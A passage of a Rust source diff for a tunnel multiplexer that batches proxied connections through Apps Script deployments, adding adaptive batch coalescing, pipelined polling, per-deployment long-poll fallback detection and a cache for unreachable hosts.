 // reason; reuse it here. `AtomicBool` works fine in std on every target.
 use portable_atomic::AtomicU64;
 use std::sync::atomic::{AtomicBool, Ordering};
-use std::sync::Arc;
+use std::sync::{Arc, Mutex};
 use std::time::{Duration, Instant};
 
 use base64::engine::general_purpose::STANDARD as B64;
 use base64::Engine;
+use bytes::{Bytes, BytesMut};
+use futures_util::stream::{FuturesUnordered, StreamExt};
 use tokio::io::{AsyncReadExt, AsyncWrite, AsyncWriteExt};
 use tokio::net::TcpStream;
 use tokio::sync::{mpsc, oneshot, Semaphore};
 
-use crate::domain_fronter::{BatchOp, DomainFronter, TunnelResponse};
+use crate::domain_fronter::{BatchOp, DomainFronter, FronterError, TunnelResponse};
 
 /// Apps Script allows 30 concurrent executions per account / deployment.
 const CONCURRENCY_PER_DEPLOYMENT: usize = 30;
@@ -38,15 +40,22 @@ const MAX_BATCH_PAYLOAD_BYTES: usize = 4 * 1024 * 1024;
 /// serializing too many sessions behind a single HTTP round-trip.
 const MAX_BATCH_OPS: usize = 50;
 
-/// Timeout for a single batch HTTP round-trip. If the tunnel-node or Apps
-/// Script takes longer than this, the batch fails and sessions get error
-/// replies rather than hanging forever.
-const BATCH_TIMEOUT: Duration = Duration::from_secs(30);
-
-/// Timeout for a session waiting for its batch reply. If the batch task
-/// is slow (e.g. one op in the batch has a dead target on the tunnel-node
-/// side), the session gives up and retries on the next tick rather than
-/// blocking indefinitely.
+// Per-batch HTTP round-trip timeout is now read from
+// `DomainFronter::batch_timeout()`, sourced from `Config::request_timeout_secs`
+// (#430, masterking32 PR #25). The historical default — 30 s, matching Apps
+// Script's typical response cliff — lives in `default_request_timeout_secs`
+// in `config.rs`.
+
+/// Slack added to the reply-timeout budget on top of `batch_timeout`.
+/// Covers spawn/encode overhead and a small margin for clock skew, so
+/// the session-side `reply_rx` doesn't fire just before `fire_batch`'s
+/// HTTP round-trip would have completed. No retry budget here — each
+/// batch makes exactly one attempt (see `fire_batch` docs).
+const REPLY_TIMEOUT_SLACK: Duration = Duration::from_secs(5);
+
+/// Per-inflight reply timeout used by the pipelined poll loop. Each
+/// in-flight future independently times out after this duration so a
+/// dead target on the tunnel-node side doesn't block the session.
 const REPLY_TIMEOUT: Duration = Duration::from_secs(35);
 
 /// How long we'll briefly hold the client socket after the local
@@ -55,6 +64,39 @@ const REPLY_TIMEOUT: Duration = Duration::from_secs(35);
 /// connect saves one Apps Script round-trip per new flow.
 const CLIENT_FIRST_DATA_WAIT: Duration = Duration::from_millis(50);
 
+/// Floor depth after a drop (first empty reply).
+const INFLIGHT_IDLE: usize = 1;
+
+/// Optimistic starting depth — every session gets 2 in-flight polls
+/// without needing an elevation permit. Drops to IDLE on first empty.
+const INFLIGHT_OPTIMIST: usize = 2;
+
+/// Maximum pipeline depth when data is actively flowing. Ramps up on
+/// data-bearing replies, drops back to IDLE after consecutive empties.
+const INFLIGHT_ACTIVE: usize = 4;
+
+/// How many consecutive empty replies before dropping from active to idle depth.
+const INFLIGHT_COOLDOWN: u32 = 3;
+
+/// Max sessions that can run at elevated pipeline depth per deployment.
+const MAX_ELEVATED_PER_DEPLOYMENT: u64 = 30;
+
+/// Adaptive coalesce defaults: after each new op arrives, wait another
+/// step for more ops. Resets on every arrival, up to max from the first
+/// op. Overridable via config `coalesce_step_ms` / `coalesce_max_ms`.
+///
+/// 200 ms balances latency against batching efficiency. The dominant
+/// bottleneck is the Apps Script round-trip (~1.5 s), so the extra
+/// 200 ms wait is negligible to the user but lets significantly more
+/// ops land in each batch — a page load that would fire 10 separate
+/// 1-op batches at 10 ms now packs 3–5 ops per batch, cutting the
+/// number of round-trips roughly in half. On idle sessions the step
+/// timer fires once with nothing queued (no cost); under load each
+/// arriving op resets the timer, so rapid bursts still coalesce up to
+/// `DEFAULT_COALESCE_MAX_MS` naturally.
+const DEFAULT_COALESCE_STEP_MS: u64 = 200;
+const DEFAULT_COALESCE_MAX_MS: u64 = 1000;
+
 /// Structured error code the tunnel-node returns when it doesn't know the
 /// op (version mismatch). Must match `tunnel-node/src/main.rs`.
 const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP";
@@ -68,6 +110,111 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP";
 /// floor, so network jitter on either side won't false-trigger.
 const LEGACY_DETECT_THRESHOLD: Duration = Duration::from_millis(1500);
 
+/// How long a deployment stays in "legacy / no long-poll" mode after the
+/// last detection. Must be much longer than `LEGACY_DETECT_THRESHOLD` so a
+/// freshly-marked deployment doesn't immediately self-recover, but short
+/// enough that a redeployed / recovered tunnel-node gets re-probed without
+/// requiring a process restart. 60 s lets one stuck deployment widen its
+/// own poll cadence without poisoning the others, and self-resets so an
+/// upgraded tunnel-node returns to the long-poll fast path on its own.
+const LEGACY_RECOVER_AFTER: Duration = Duration::from_secs(60);
+
+/// How long to remember a `Network is unreachable` / `No route to host`
+/// failure for a given `(host, port)`. While cached, the proxy short-circuits
+/// repeat CONNECTs with an immediate "host unreachable" reply instead of
+/// burning a 1.5–2s tunnel batch round-trip on a target that just failed.
+/// Real motivator: IPv6-only probe hostnames (e.g. `ds6.probe.*`) on devices
+/// without IPv6 — the OS retries the probe every ~1.5s for 10s+, generating
+/// 5–10 wasted tunnel sessions per probe.
+const UNREACHABLE_CACHE_TTL: Duration = Duration::from_secs(30);
+
+/// Hard cap on negative-cache size. Browsing pulls in dozens of distinct
+/// hosts; we don't want a runaway map. Pruned opportunistically on insert.
+const UNREACHABLE_CACHE_MAX: usize = 256;
+
+// ---------------------------------------------------------------------------
+// Pipeline debug overlay state — temporary, polled from Android UI.
+// ---------------------------------------------------------------------------
+pub(crate) mod pipeline_debug {
+    use std::collections::VecDeque;
+    use std::sync::{Mutex, OnceLock};
+    use portable_atomic::AtomicU64;
+    use std::sync::atomic::Ordering;
+
+    const EVENT_CAP: usize = 30;
+
+    struct SessionInfo {
+        depth: usize,
+        inflight: usize,
+        elevated: bool,
+    }
+
+    struct State {
+        events: Mutex<VecDeque<String>>,
+        elevated: AtomicU64,
+        max_elevated: AtomicU64,
+        active_batches: AtomicU64,
+        max_batch_slots: AtomicU64,
+        active_sessions: AtomicU64,
+        sessions: Mutex<std::collections::HashMap<String, SessionInfo>>,
+    }
+
+    fn state() -> &'static State {
+        static S: OnceLock<State> = OnceLock::new();
+        S.get_or_init(|| State {
+            events: Mutex::new(VecDeque::with_capacity(EVENT_CAP)),
+            elevated: AtomicU64::new(0),
+            max_elevated: AtomicU64::new(0),
+            active_batches: AtomicU64::new(0),
+            max_batch_slots: AtomicU64::new(0),
+            active_sessions: AtomicU64::new(0),
+            sessions: Mutex::new(std::collections::HashMap::new()),
+        })
+    }
+
+    pub fn push_event(_msg: String) {}
+    pub fn set_limits(_max_elev: u64, _max_batches: u64) {}
+    pub fn set_elevated(_n: u64) {}
+    pub fn batch_acquire() {}
+    pub fn batch_release() {}
+    pub fn session_start(_sid: &str) {}
+    pub fn session_end(_sid: &str) {}
+    pub fn session_update(_sid: &str, _depth: usize, _inflight: usize, _elevated: bool) {}
+
+    pub fn to_json() -> String {
+        let s = state();
+        let events_json = if let Ok(g) = s.events.lock() {
+            let escaped: Vec<String> = g.iter().map(|e| {
+                format!("\"{}\"", e.replace('\\', "\\\\").replace('"', "\\\""))
+            }).collect();
+            format!("[{}]", escaped.join(","))
+        } else {
+            "[]".to_string()
+        };
+        let sessions_json = if let Ok(g) = s.sessions.lock() {
+            let entries: Vec<String> = g.iter().map(|(sid, info)| {
+                format!(
+                    r#"{{"sid":"{}","depth":{},"inflight":{},"elevated":{}}}"#,
+                    sid, info.depth, info.inflight, info.elevated,
+                )
+            }).collect();
+            format!("[{}]", entries.join(","))
+        } else {
+            "[]".to_string()
+        };
+        format!(
+            r#"{{"elevated":{},"max_elevated":{},"active_batches":{},"max_batch_slots":{},"active_sessions":{},"sessions":{},"events":{}}}"#,
+            s.elevated.load(Ordering::Relaxed),
+            s.max_elevated.load(Ordering::Relaxed),
+            s.active_batches.load(Ordering::Relaxed),
+            s.max_batch_slots.load(Ordering::Relaxed),
+            s.active_sessions.load(Ordering::Relaxed),
+            sessions_json,
+            events_json,
+        )
+    }
+}
+
 /// Ports where the *server* speaks first (SMTP banner, SSH identification,
 /// POP3/IMAP greeting, FTP banner). On these, waiting for client bytes
 /// gains nothing and just adds handshake latency — skip the pre-read.
@@ -77,10 +224,44 @@ fn is_server_speaks_first(port: u16) -> bool {
     matches!(port, 21 | 22 | 25 | 80 | 110 | 143 | 587)
 }
 
+/// Recognize the tunnel-node's connect-error strings that mean
+/// "this destination is fundamentally unreachable from the tunnel-node's
+/// network right now" — distinct from refused/reset/timeout, which can be
+/// transient. These come through as the inner `e` of a `TunnelResponse`
+/// after the tunnel-node's std::io::Error is stringified, so we match on
+/// substrings rather than `ErrorKind`. Linux: errno 101 (ENETUNREACH),
+/// errno 113 (EHOSTUNREACH). Format varies a bit across libc/Tokio
+/// versions, so cover both the human text and the os-error tag.
+fn is_unreachable_error_str(s: &str) -> bool {
+    let lc = s.to_ascii_lowercase();
+    lc.contains("network is unreachable")
+        || lc.contains("no route to host")
+        || lc.contains("os error 101")
+        || lc.contains("os error 113")
+}
+
+/// Canonicalize a host string for use as a negative-cache key. DNS names
+/// are case-insensitive and may carry a trailing root-label dot, so
+/// `Example.COM:443`, `example.com:443`, and `example.com.:443` are all the
+/// same destination. IPv4 / IPv6 literals are unaffected — IPv4 has no
+/// letters, and `Ipv6Addr::to_string()` already emits lowercase.
+fn normalize_cache_host(host: &str) -> String {
+    let trimmed = host.strip_suffix('.').unwrap_or(host);
+    trimmed.to_ascii_lowercase()
+}
+
 // ---------------------------------------------------------------------------
 // Multiplexer
 // ---------------------------------------------------------------------------
 
+/// Reply payload for ops that go through `fire_batch`. The `String` is the
+/// `script_id` of the deployment that processed the batch — needed by
+/// `tunnel_loop`'s legacy-detection and per-deployment skip-when-idle
+/// decisions, which can't reach `fire_batch`'s local `script_id` any
+/// other way. Plain `Connect` doesn't go through `fire_batch` and keeps
+/// the simpler reply type.
+type BatchedReply = oneshot::Sender<Result<(TunnelResponse, String), String>>;
+
 enum MuxMsg {
     Connect {
         host: String,
@@ -90,48 +271,104 @@ enum MuxMsg {
     ConnectData {
         host: String,
         port: u16,
-        // Arc so the caller can hand the buffer to the mux AND keep a ref
-        // for the fallback path without an extra 64 KB copy per session.
-        data: Arc<Vec<u8>>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        // `Bytes` is internally Arc-backed, so the caller can cheaply
+        // clone() to keep its own reference for the unsupported-fallback
+        // replay path without an extra 64 KB copy per session.
+        data: Bytes,
+        reply: BatchedReply,
     },
     Data {
         sid: String,
-        data: Vec<u8>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        data: Bytes,
+        seq: Option<u64>,
+        wseq: Option<u64>,
+        reply: BatchedReply,
     },
     UdpOpen {
         host: String,
         port: u16,
-        data: Vec<u8>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        data: Bytes,
+        reply: BatchedReply,
     },
     UdpData {
         sid: String,
-        data: Vec<u8>,
-        reply: oneshot::Sender<Result<TunnelResponse, String>>,
+        data: Bytes,
+        reply: BatchedReply,
     },
     Close {
         sid: String,
     },
 }
 
+/// Raw, not-yet-encoded form of a batch operation. Lives only inside
+/// `mux_loop` and gets converted to `BatchOp` (with base64-encoded `d`)
+/// inside `fire_batch`'s spawned task — keeping the encoding work off
+/// the single mux thread, which previously had to base64 every op
+/// inline before it could move on to the next message.
+struct PendingOp {
+    op: &'static str,
+    sid: Option<String>,
+    host: Option<String>,
+    port: Option<u16>,
+    /// Raw payload. `None` for empty polls / opless ops; `Some` even
+    /// when empty preserves the connect_data shape (always emits `d`).
+    data: Option<Bytes>,
+    /// True for ops that must serialize `d` even when empty (currently
+    /// only `connect_data`, which uses presence of `d` as the signal
+    /// that the caller is opting into the bundled-first-bytes flow).
+    encode_empty: bool,
+    seq: Option<u64>,
+    wseq: Option<u64>,
+}
+
 pub struct TunnelMux {
-    tx: mpsc::Sender<MuxMsg>,
+    tx: mpsc::UnboundedSender<MuxMsg>,
     /// Set to `true` after the first time the tunnel-node rejects
     /// `connect_data` as unsupported. Subsequent sessions skip the
     /// optimistic path entirely and go straight to plain connect + data.
     connect_data_unsupported: Arc<AtomicBool>,
-    /// Set to `true` after we observe an empty poll round-trip that
-    /// returned in less than `LEGACY_DETECT_THRESHOLD` with no data.
-    /// On a long-poll-capable tunnel-node, an empty poll either returns
-    /// quickly *with data* (push arrived) or holds open until the
-    /// server's `LONGPOLL_DEADLINE`. A fast empty reply means the server
-    /// is doing the legacy fixed-sleep drain — in that mode, hammering
-    /// idle sessions at the new 500 ms cadence wastes Apps Script quota
-    /// for no benefit, so the loop reverts to the pre-long-poll
-    /// "skip empty polls when idle" behavior.
-    server_no_longpoll: Arc<AtomicBool>,
+    /// Per-deployment legacy state: `script_id` → time it was last
+    /// observed serving an empty poll faster than `LEGACY_DETECT_THRESHOLD`.
+    /// Absence means "long-poll capable, or untested." Entries expire after
+    /// `LEGACY_RECOVER_AFTER` so a redeployed / recovered tunnel-node
+    /// rejoins the long-poll fast path without requiring a process restart.
+    ///
+    /// Note: the per-deployment marks here do *not* drive a per-deployment
+    /// poll cadence — the `tunnel_loop` cadence (read-timeout backoff and
+    /// skip-empty-when-idle) is gated on the aggregate `all_legacy`,
+    /// because the next op's deployment is chosen later by
+    /// `next_script_id()` round-robin and the loop can't pre-select. What
+    /// the per-deployment design *does* fix vs the old single AtomicBool:
+    ///   * one slow / legacy deployment can no longer flip the aggregate
+    ///     true on its own — every deployment has to be marked first;
+    ///   * deployments recover individually on the TTL, so an upgraded
+    ///     tunnel-node lifts the aggregate without needing the others to
+    ///     also recover or the process to restart;
+    ///   * the warn log fires once per (deployment, recovery cycle), so
+    ///     re-detection after recovery is a real signal in the logs.
+    /// The cost: legacy deployments still receive fast empty polls in
+    /// mixed mode (round-robin doesn't know to avoid them). Worth it to
+    /// keep pushed bytes flowing through the long-poll-capable peers.
+    legacy_deployments: Mutex<HashMap<String, Instant>>,
+    /// Lock-free hot-path snapshot of "every known deployment is currently
+    /// in legacy mode." Recomputed under `legacy_deployments`'s mutex on
+    /// every mark/expire and read with a relaxed load from `tunnel_loop`.
+    /// True only when this process has fast-empty observations for *all*
+    /// `num_scripts` deployments simultaneously — that's when the per-
+    /// session 30 s read-timeout backoff (the only setting where there is
+    /// no per-deployment alternative) is still appropriate. Invariant: the
+    /// atomic is always written *after* the map insert, under the same
+    /// lock, so any reader that sees `true` was preceded by a complete
+    /// map update.
+    all_legacy: Arc<AtomicBool>,
+    /// Count of *unique* configured deployment IDs at start time.
+    /// Snapshotted from `fronter.script_id_list()` deduped, since the
+    /// aggregate gate compares this against `legacy_deployments.len()`
+    /// (a HashMap, so unique-keyed) — using the raw configured count
+    /// would make the gate unreachable whenever a user lists the same
+    /// script_id twice. Blacklisted-but-configured deployments still
+    /// count here; see `all_servers_legacy` for why.
+    num_scripts: usize,
     /// Pre-read observability. Lets an operator see whether the 50 ms
     /// wait-for-first-bytes is pulling its weight:
     ///   * `preread_win` — client sent bytes in time, bundled with connect
@@ -149,65 +386,137 @@ pub struct TunnelMux {
     /// Separate monotonic counter used only to trigger the summary log
     /// (avoids a race where two threads both see `total % 100 == 0`).
     preread_total_events: AtomicU64,
+    /// Short-lived negative cache for targets the tunnel-node reported as
+    /// unreachable (`Network is unreachable` / `No route to host`). Keyed by
+    /// `(host, port)`, value is the expiry instant. Plain Mutex<HashMap> is
+    /// fine: it's touched once per CONNECT (cheap) and once per failure.
+    unreachable_cache: Mutex<HashMap<(String, u16), Instant>>,
+    /// How long a session waits for its batch reply before giving up and
+    /// retry-polling on the next tick. Computed at construction from
+    /// `fronter.batch_timeout() + REPLY_TIMEOUT_SLACK` so the session-
+    /// side `reply_rx` always outlives `fire_batch`'s single HTTP
+    /// round-trip. Without runtime derivation, an operator who raises
+    /// `request_timeout_secs` would see sessions abandon replies just
+    /// before the batch would have completed.
+    reply_timeout: Duration,
+    /// How many sessions are currently at elevated pipeline depth (>= 3).
+    elevated_sessions: AtomicU64,
+    max_elevated: u64,
 }
 
 impl TunnelMux {
-    pub fn start(fronter: Arc<DomainFronter>) -> Arc<Self> {
-        let n = fronter.num_scripts();
+    pub fn start(fronter: Arc<DomainFronter>, coalesce_step_ms: u64, coalesce_max_ms: u64) -> Arc<Self> {
+        // Dedupe before snapshotting: the aggregate `all_legacy` gate
+        // compares `legacy_deployments.len()` (a HashMap, so unique
+        // keys) against this count, so using the raw `num_scripts()`
+        // would make the gate unreachable whenever a user lists the
+        // same script_id twice in config.
+        let unique: std::collections::HashSet<&str> = fronter
+            .script_id_list()
+            .iter()
+            .map(String::as_str)
+            .collect();
+        let unique_n = unique.len();
+        let raw_n = fronter.num_scripts();
+        if unique_n != raw_n {
+            tracing::warn!(
+                "tunnel mux: {} deployments configured but only {} unique script_id(s) — duplicate entries ignored for legacy detection",
+                raw_n,
+                unique_n,
+            );
+        }
         tracing::info!(
             "tunnel mux: {} deployment(s), {} concurrent per deployment",
-            n,
+            unique_n,
             CONCURRENCY_PER_DEPLOYMENT
         );
-        let (tx, rx) = mpsc::channel(512);
-        tokio::spawn(mux_loop(rx, fronter));
+        let step = if coalesce_step_ms > 0 { coalesce_step_ms } else { DEFAULT_COALESCE_STEP_MS };
+        let max = if coalesce_max_ms > 0 { coalesce_max_ms } else { DEFAULT_COALESCE_MAX_MS };
+        tracing::info!("batch coalesce: step={}ms max={}ms, pipeline max depth: {}, optimist: {}", step, max, INFLIGHT_ACTIVE, INFLIGHT_OPTIMIST);
+        // Reply timeout co-varies with `request_timeout_secs` so an
+        // operator who raises the batch budget doesn't have sessions
+        // abandoning replies just before the HTTP round-trip would
+        // have completed. See the `reply_timeout` field comment for
+        // the invariant.
+        let reply_timeout = fronter
+            .batch_timeout()
+            .saturating_add(REPLY_TIMEOUT_SLACK);
+        pipeline_debug::set_limits(
+            MAX_ELEVATED_PER_DEPLOYMENT * unique_n as u64,
+            (CONCURRENCY_PER_DEPLOYMENT * unique_n) as u64,
+        );
+        let (tx, rx) = mpsc::unbounded_channel();
+        tokio::spawn(mux_loop(rx, fronter, step, max));
         Arc::new(Self {
             tx,
             connect_data_unsupported: Arc::new(AtomicBool::new(false)),
-            server_no_longpoll: Arc::new(AtomicBool::new(false)),
+            legacy_deployments: Mutex::new(HashMap::new()),
+            all_legacy: Arc::new(AtomicBool::new(false)),
+            num_scripts: unique_n,
             preread_win: AtomicU64::new(0),
             preread_loss: AtomicU64::new(0),
             preread_skip_port: AtomicU64::new(0),
             preread_skip_unsupported: AtomicU64::new(0),
             preread_win_total_us: AtomicU64::new(0),
             preread_total_events: AtomicU64::new(0),
+            unreachable_cache: Mutex::new(HashMap::new()),
+            reply_timeout,
+            elevated_sessions: AtomicU64::new(0),
+            max_elevated: MAX_ELEVATED_PER_DEPLOYMENT * unique_n as u64,
         })
     }
 
+    /// How long a session waits for its batch reply before retry-polling.
+    /// Co-varies with `Config::request_timeout_secs` so `fire_batch`'s
+    /// single HTTP round-trip is always covered.
+    pub fn reply_timeout(&self) -> Duration {
+        self.reply_timeout
+    }
+
+    fn send_sync(&self, msg: MuxMsg) {
+        let _ = self.tx.send(msg);
+    }
+
     async fn send(&self, msg: MuxMsg) {
-        let _ = self.tx.send(msg).await;
+        let _ = self.tx.send(msg);
     }
 
     pub async fn udp_open(
         &self,
         host: &str,
         port: u16,
-        data: Vec<u8>,
+        data: impl Into<Bytes>,
     ) -> Result<TunnelResponse, String> {
         let (reply_tx, reply_rx) = oneshot::channel();
         self.send(MuxMsg::UdpOpen {
             host: host.to_string(),
             port,
-            data,
+            data: data.into(),
             reply: reply_tx,
         })
         .await;
         match reply_rx.await {
-            Ok(r) => r,
+            Ok(Ok((resp, _script_id))) => Ok(resp),
+            Ok(Err(e)) => Err(e),
             Err(_) => Err("mux channel closed".into()),
         }
     }
 
-    pub async fn udp_data(&self, sid: &str, data: Vec<u8>) -> Result<TunnelResponse, String> {
+    pub async fn udp_data(
+        &self,
+        sid: &str,
+        data: impl Into<Bytes>,
+    ) -> Result<TunnelResponse, String> {
         let (reply_tx, reply_rx) = oneshot::channel();
         self.send(MuxMsg::UdpData {
             sid: sid.to_string(),
-            data,
+            data: data.into(),
             reply: reply_tx,
         })
         .await;
         match reply_rx.await {
-            Ok(r) => r,
+            Ok(Ok((resp, _script_id))) => Ok(resp),
+            Ok(Err(e)) => Err(e),
             Err(_) => Err("mux channel closed".into()),
         }
     }
@@ -231,19 +540,147 @@ impl TunnelMux {
         }
     }
 
-    fn server_no_longpoll(&self) -> bool {
-        self.server_no_longpoll.load(Ordering::Relaxed)
+    /// True only when *every* known deployment is currently in legacy
+    /// mode. Both per-session decisions in `tunnel_loop` (the 30 s
+    /// read-timeout backoff and the skip-empty-when-idle short-circuit)
+    /// gate on this aggregate — they can't pick a per-deployment answer
+    /// ahead of time because the next op's deployment is chosen by
+    /// `next_script_id()` only when the batch fires. With one
+    /// long-poll-capable peer still around, the loop must keep emitting
+    /// empty polls so round-robin lands some on that peer (where the
+    /// server can hold them open and deliver pushed bytes).
+    ///
+    /// Known limitation: the comparison is against *all configured*
+    /// deployments (`num_scripts`), not currently-selectable ones. A
+    /// fleet where most deployments are blacklisted in `DomainFronter`
+    /// (10 min cooldown) and the only selectable deployment(s) are
+    /// legacy will keep the fast cadence for up to that cooldown, even
+    /// though every reachable peer is legacy. Accepted because
+    /// integrating the blacklist would require a hot-path query on the
+    /// fronter's mutex once per `tunnel_loop` iteration; a heavily-
+    /// blacklisted fleet has bigger problems than quota optimization,
+    /// and the worst-case quota cost is bounded by the cooldown.
+    ///
+    /// Hot path: lock-free relaxed load. If the cached value is `true`,
+    /// double-check under the mutex with a sweep for expired entries —
+    /// otherwise stale legacy marks would keep us in the slow path forever
+    /// after every deployment recovers (the `mark_server_no_longpoll` sweep
+    /// only fires on the next mark, which may never come).
+    fn all_servers_legacy(&self) -> bool {
+        if !self.all_legacy.load(Ordering::Relaxed) {
+            return false;
+        }
+        let now = Instant::now();
+        let mut deps = match self.legacy_deployments.lock() {
+            Ok(g) => g,
+            Err(p) => p.into_inner(),
+        };
+        deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER);
+        let still_all = deps.len() == self.num_scripts;
+        if !still_all {
+            self.all_legacy.store(false, Ordering::Relaxed);
+        }
+        still_all
     }
 
-    fn mark_server_no_longpoll(&self) {
-        if !self.server_no_longpoll.swap(true, Ordering::Relaxed) {
+    fn mark_server_no_longpoll(&self, script_id: &str) {
+        let now = Instant::now();
+        let mut deps = match self.legacy_deployments.lock() {
+            Ok(g) => g,
+            Err(p) => p.into_inner(),
+        };
+        // Inline expiry sweep: if any entry has aged past
+        // LEGACY_RECOVER_AFTER, drop it before recomputing `all_legacy`.
+        // Without this, an entry that should have recovered would still
+        // count toward the aggregate.
+        deps.retain(|_, marked_at| now.duration_since(*marked_at) < LEGACY_RECOVER_AFTER);
+        let was_present = deps.contains_key(script_id);
+        deps.insert(script_id.to_string(), now);
+        let all = deps.len() == self.num_scripts;
+        // Atomic written under the lock and *after* the map insert. Any
+        // reader that observes `all_legacy = true` has seen a complete
+        // map state where every deployment is marked.
+        self.all_legacy.store(all, Ordering::Relaxed);
+        drop(deps);
+        // Only log on first-mark-for-this-cycle: after `LEGACY_RECOVER_AFTER`
+        // expiry + re-detection we re-log, which is intentional — that's
+        // a real signal that the deployment regressed back to legacy mode.
+        if !was_present {
+            let short = &script_id[..script_id.len().min(8)];
             tracing::warn!(
-                "tunnel-node returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — falling back to skip-empty-when-idle to avoid quota waste",
+                "tunnel-node deployment {}... returned an empty poll faster than {:?}; assuming legacy (no long-poll) drain — this deployment will skip empty polls when idle for the next {:?}",
+                short,
                 LEGACY_DETECT_THRESHOLD,
+                LEGACY_RECOVER_AFTER,
             );
         }
     }
 
+    /// Returns true if `(host, port)` has a non-expired unreachable entry.
+    /// The proxy front-end uses this to skip the tunnel and reply
+    /// "host unreachable" immediately on follow-up CONNECTs.
+    pub fn is_unreachable(&self, host: &str, port: u16) -> bool {
+        let now = Instant::now();
+        let mut cache = match self.unreachable_cache.lock() {
+            Ok(g) => g,
+            Err(p) => p.into_inner(),
+        };
+        let key = (normalize_cache_host(host), port);
+        match cache.get(&key) {
+            Some(expiry) if *expiry > now => true,
+            Some(_) => {
+                cache.remove(&key);
+                false
+            }
+            None => false,
+        }
+    }
+
+    /// If `err` looks like a network-unreachable / no-route-to-host error
+    /// from the tunnel-node, remember the target for `UNREACHABLE_CACHE_TTL`.
+    /// No-op for any other error (timeouts, refused, EOF, etc.) — those can
+    /// be transient and we don't want to lock out a host on a flaky moment.
+    fn record_unreachable_if_match(&self, host: &str, port: u16, err: &str) {
+        if !is_unreachable_error_str(err) {
+            return;
+        }
+        let mut cache = match self.unreachable_cache.lock() {
+            Ok(g) => g,
+            Err(p) => p.into_inner(),
+        };
+        // Cap enforcement is two-stage: first drop anything already expired,
+        // then if we're STILL at/above the cap (i.e. an unbounded burst of
+        // unique unreachable hosts within the TTL), evict the entry that
+        // would expire soonest. This bounds the map size at all times — a
+        // pure `retain` on expiry alone would let the map grow unbounded
+        // until the first entry's TTL elapses.
+        if cache.len() >= UNREACHABLE_CACHE_MAX {
+            let now = Instant::now();
+            cache.retain(|_, expiry| *expiry > now);
+            while cache.len() >= UNREACHABLE_CACHE_MAX {
+                let victim = cache
+                    .iter()
+                    .min_by_key(|(_, expiry)| **expiry)
+                    .map(|(k, _)| k.clone());
+                match victim {
+                    Some(k) => {
+                        cache.remove(&k);
+                    }
+                    None => break,
+                }
+            }
+        }
+        let key = (normalize_cache_host(host), port);
+        cache.insert(key, Instant::now() + UNREACHABLE_CACHE_TTL);
+        tracing::debug!(
+            "negative-cached {}:{} for {:?} ({})",
+            host,
+            port,
+            UNREACHABLE_CACHE_TTL,
+            err
+        );
+    }
+
     fn record_preread_win(&self, port: u16, elapsed: Duration) {
         self.preread_win.fetch_add(1, Ordering::Relaxed);
         self.preread_win_total_us
@@ -302,7 +739,9 @@ impl TunnelMux {
     }
 }
 
-async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
+async fn mux_loop(mut rx: mpsc::UnboundedReceiver<MuxMsg>, fronter: Arc<DomainFronter>, coalesce_step_ms: u64, coalesce_max_ms: u64) {
+    let coalesce_step = Duration::from_millis(coalesce_step_ms);
+    let coalesce_max = Duration::from_millis(coalesce_max_ms);
     // One semaphore per deployment ID, each allowing 30 concurrent requests.
     let sems: Arc<HashMap<String, Arc<Semaphore>>> = Arc::new(
         fronter
@@ -319,21 +758,42 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
 
     loop {
         let mut msgs = Vec::new();
-        match tokio::time::timeout(Duration::from_millis(30), rx.recv()).await {
-            Ok(Some(msg)) => msgs.push(msg),
-            Ok(None) => break,
-            Err(_) => continue,
+        // Block on the first message — no point waking up to find an empty
+        // queue. Once the first op lands, the adaptive coalesce loop waits
+        // in `coalesce_step` increments (resetting on each new arrival, up
+        // to `coalesce_max`) so concurrent ops land in the same batch.
+        match rx.recv().await {
+            Some(msg) => msgs.push(msg),
+            None => break,
         }
-        while let Ok(msg) = rx.try_recv() {
-            msgs.push(msg);
+        let hard_deadline = tokio::time::Instant::now() + coalesce_max;
+        let mut soft_deadline = tokio::time::Instant::now() + coalesce_step;
+        loop {
+            // Drain anything that's already queued without waiting.
+            while let Ok(msg) = rx.try_recv() {
+                msgs.push(msg);
+                // Reset the soft deadline — more ops are arriving.
+                soft_deadline = tokio::time::Instant::now() + coalesce_step;
+            }
+            let now = tokio::time::Instant::now();
+            let wait_until = soft_deadline.min(hard_deadline);
+            if now >= wait_until {
+                break;
+            }
+            match tokio::time::timeout(wait_until - now, rx.recv()).await {
+                Ok(Some(msg)) => {
+                    msgs.push(msg);
+                    // New op arrived — extend the soft deadline.
+                    soft_deadline = tokio::time::Instant::now() + coalesce_step;
+                }
+                Ok(None) => return,
+                Err(_) => break, // soft or hard deadline hit, no more ops
+            }
         }
 
         // Split: plain connects go parallel, data-bearing ops get batched.
-        let mut data_ops: Vec<BatchOp> = Vec::new();
-        let mut data_replies: Vec<(usize, oneshot::Sender<Result<TunnelResponse, String>>)> =
-            Vec::new();
+        let mut accum = BatchAccum::new();
         let mut close_sids: Vec<String> = Vec::new();
-        let mut batch_payload_bytes: usize = 0;
 
         for msg in msgs {
             match msg {
@@ -359,68 +819,32 @@ async fn mux_loop(mut rx: mpsc::Receiver<MuxMsg>, fronter: Arc<DomainFronter>) {
                     data,
                     reply,
                 } => {
-                    let encoded = Some(B64.encode(data.as_slice()));
-                    let op_bytes = encoded.as_ref().map(|s| s.len()).unwrap_or(0);
-
-                    if !data_ops.is_empty()
-                        && (data_ops.len() >= MAX_BATCH_OPS
-                            || batch_payload_bytes + op_bytes > MAX_BATCH_PAYLOAD_BYTES)
-                    {
-                        fire_batch(
-                            &sems,
-                            &fronter,
-                            std::mem::take(&mut data_ops),
-                            std::mem::take(&mut data_replies),
-                        )
-                        .await;
-                        batch_payload_bytes = 0;
-                    }
-
-                    let idx = data_ops.len();
-                    data_ops.push(BatchOp {
-                        op: "connect_data".into(),
+                    let op_bytes = encoded_len(data.len());
+                    let op = PendingOp {
+                        op: "connect_data",
                         sid: None,
                         host: Some(host),
                         port: Some(port),
-                        d: encoded,
-                    });
-                    data_replies.push((idx, reply));
-                    batch_payload_bytes += op_bytes;
-                }
-                MuxMsg::Data { sid, data, reply } => {
-                    let encoded = if data.is_empty() {
